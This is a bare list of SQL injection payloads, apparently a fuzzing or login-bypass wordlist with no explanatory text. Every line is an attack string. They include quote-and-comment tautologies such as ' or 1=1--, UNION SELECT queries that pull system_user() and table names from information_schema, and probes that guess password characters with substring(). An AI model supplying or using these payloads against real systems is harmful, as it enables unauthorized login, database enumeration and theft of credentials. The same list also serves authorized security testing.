
 and 1=1
 and 1=1–
 like '%'
 or 0=0 #
 or 0=0 --
 or 0=0 –
 or 1=1
 or 1=1#
 or 1=1--
 or 1=1/*
 or 1=1–
 or true
" #
" --
" or ""="
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 0=0 –
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1#
" or 1=1--
" or 1=1/*
" or 1=1–
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
") or ("a"="a
"/*
"or 1=1 or ""="
%' or '0'='0
'
' #
' --
' OR 'x'='x'#;
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
' and 'one'='one
' and 'one'='one–
' and 1='1
' and a='a
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
' or         0=0 #
' or ''='
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1′='1
' or 'a'='a
' or 'one'='one
' or 'one'='one–
' or 'x'='x
' or 0=0 #
' or 0=0 --
' or 0=0 –
' or 1=1
' or 1=1 --
' or 1=1 LIMIT 1;#
' or 1=1 –
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;#
' or 1=1–
' or a=a--
' or a=a–
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' –
'#
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
') or ('x'='x
'--
'/*
'=' 'or' and '=' 'or'
'or 1=1 or ''='
'or'1=1
'or'1=1′
) or '1′='1–
) or ('1′='1–
=
==
admin' and substring(password/text(),1,1)='7
1′) and '1′='1–
